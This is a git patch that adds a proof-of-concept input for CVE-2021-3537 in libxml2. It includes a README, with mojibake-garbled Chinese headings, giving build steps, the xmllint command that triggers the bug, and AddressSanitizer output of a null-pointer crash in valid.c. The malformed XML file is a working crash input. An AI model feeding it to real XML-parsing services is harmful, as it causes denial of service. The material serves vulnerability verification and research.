From 14add2868a65ec99762877175d8091963184d95d Mon Sep 17 00:00:00 2001 From: "LI, WENJIE" Date: Wed, 30 Nov 2022 22:05:59 +0800 Subject: [PATCH] add CVE-2021-3537. --- .../2021/CVE-2021-3537/CVE-2021-3537-poc | 23 ++++ cve/libxml2/2021/CVE-2021-3537/README.md | 118 ++++++++++++++++++ 2 files changed, 141 insertions(+) create mode 100644 cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc create mode 100644 cve/libxml2/2021/CVE-2021-3537/README.md diff --git a/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc new file mode 100644 index 00000000..83fe4f1b --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc @@ -0,0 +1,23 @@ +<:> + + + + + +<÷ßóELEMEÿÿ<:> + + + + + +<]@? \ No newline at end of file diff --git a/cve/libxml2/2021/CVE-2021-3537/README.md b/cve/libxml2/2021/CVE-2021-3537/README.md new file mode 100644 index 00000000..56b1d099 --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/README.md @@ -0,0 +1,118 @@ +## æ¼æ´žéªŒè¯ +### 下载æºç  +https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1) + +### 编译 +```bash +$ cd libxml2 +#下载编译ä¾èµ– +$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev +#å¼€å¯-ggdb -fsanitize=address +$ CFLAGS="-ggdb -fsanitize=address" ./configure +#编译 +$ make +``` + +### æ¼æ´žå¤çŽ° +```bash +$ ./xmllint --recover --postvalid ../CVE/CVE-2021-3537-poc +../CVE/CVE-2021-3537-poc:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name ! +' +:(<:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : ContentDecl : Name or '(' expected +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration + +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : DOCTYPE improperly terminated +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: namespace error : Failed to parse QName ':' +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:11: parser error : Couldn't find end of Start Tag YPE line 11 +<:> + ^ +../CVE/CVE-2021-3537-poc:23: parser error : StartTag: invalid element name +<]@? + ^ +../CVE/CVE-2021-3537-poc:23: parser error : EndTag: '<]@? + ^ +output error : string is not in UTF-8 + + +]> +<:> + + + + + +<:> + + + + + +]@? +AddressSanitizer:DEADLYSIGNAL +================================================================= +==18011==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f16b52bdd80 bp 0x7ffe22b96a50 sp 0x7ffe22b96920 T0) +==18011==The signal is caused by a READ memory access. +==18011==Hint: address points to the zero page. + #0 0x7f16b52bdd7f in xmlValidBuildAContentModel /data1/libxml2-openkylin-yangtze/valid.c:729 + #1 0x7f16b52bebc7 in xmlValidBuildContentModel__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:839 + #2 0x7f16b52d0c69 in xmlValidateElementContent /data1/libxml2-openkylin-yangtze/valid.c:5330 + #3 0x7f16b52d4ab6 in xmlValidateOneElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6234 + #4 0x7f16b52d61c3 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6479 + #5 0x7f16b52d8893 in xmlValidateDocument__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6942 + #6 0x564d2e3c2703 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2799 + #7 0x564d2e3c8cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728 + #8 0x7f16b4f7c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) + #9 0x564d2e3b8aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed) + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV /data1/libxml2-openkylin-yangtze/valid.c:729 in xmlValidBuildAContentModel +==18011==ABORTING +``` \ No newline at end of file -- Gitee